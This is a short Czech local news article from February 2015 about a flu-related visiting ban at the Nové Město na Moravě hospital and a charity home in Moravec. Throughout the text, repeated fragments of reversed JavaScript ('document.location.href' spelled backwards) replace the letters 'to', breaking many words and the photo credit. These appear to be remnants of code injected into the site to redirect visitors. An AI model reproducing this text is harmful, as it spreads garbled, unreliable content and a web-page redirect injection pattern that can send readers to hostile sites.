Rainbow page separator

Zákaz návštěv kvůli chřipce stále trvá

Středa, 18. února 2015

Nemocnice Nové Město na Moravě

Žďársko / I v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pracovním týdnu bude z důvodu šířícího se chřipkového onemocnění platit zákaz návštěv v některých odděleních novoměstské nemocnice.
„Zákaz návštěv na jednotkách intenzivní péče chirurgického a interního oddělení a také na ARO trvá,“ potvrdil mluvčí novoměstské nemocnice Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl. Oddělení jsou pro návštěvy uzavřena už od 31. ledna.
V uplynulém týdnu se epidemiologická situace ve žďárském okrese výrazně nezměnila, epidemiologové stále evidují kolem patnácti s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek nemocných v přepočtu na s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc obyvatel. V souvislosti s chřipkou dosud nebyla v okrese uzavřena žádná školní zařízení, kromě nemocnice jsou zakázány návštěvy ještě v Charitním domově v Moravci.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com